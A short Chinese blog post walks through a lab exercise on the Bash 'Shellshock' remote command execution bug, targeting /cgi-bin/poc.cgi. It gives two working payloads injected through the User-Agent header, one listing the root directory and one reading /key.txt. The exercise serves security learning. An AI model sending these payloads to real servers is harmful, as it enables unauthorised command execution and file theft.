标签:原因 网上 gen 描述 漏洞分析 agent 技术 follow svi
安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞。
1、了解bash;
2、了解Bash远程命令执行漏洞形成原因;
3、了解Bash远程命令执行漏洞利用方法;
找到poc.cgi文件
根据题目说明,在网上对Bash远程命令执行漏洞进行了一番学习。
参考连接
freebuf:https://www.freebuf.com/vuls/44994.html
Seebug:https://www.seebug.org/vuldb/ssvid-88877
通过网上的资料搜查,发现此漏洞存在的路径多数在网页/cgi-bin/下,结合题目给的提示,打开http://url/cgi-bin/poc.cgi
构造执行语句插入到请求头的User-Agent头里面
User-Agent: () { :;}; echo; /bin/ls /
然后构造执行语句查看key.txt
User-Agent: () { :;}; echo; /bin/cat /key.txt
标签:原因 网上 gen 描述 漏洞分析 agent 技术 follow svi
原文地址:https://www.cnblogs.com/qtisec/p/11095444.html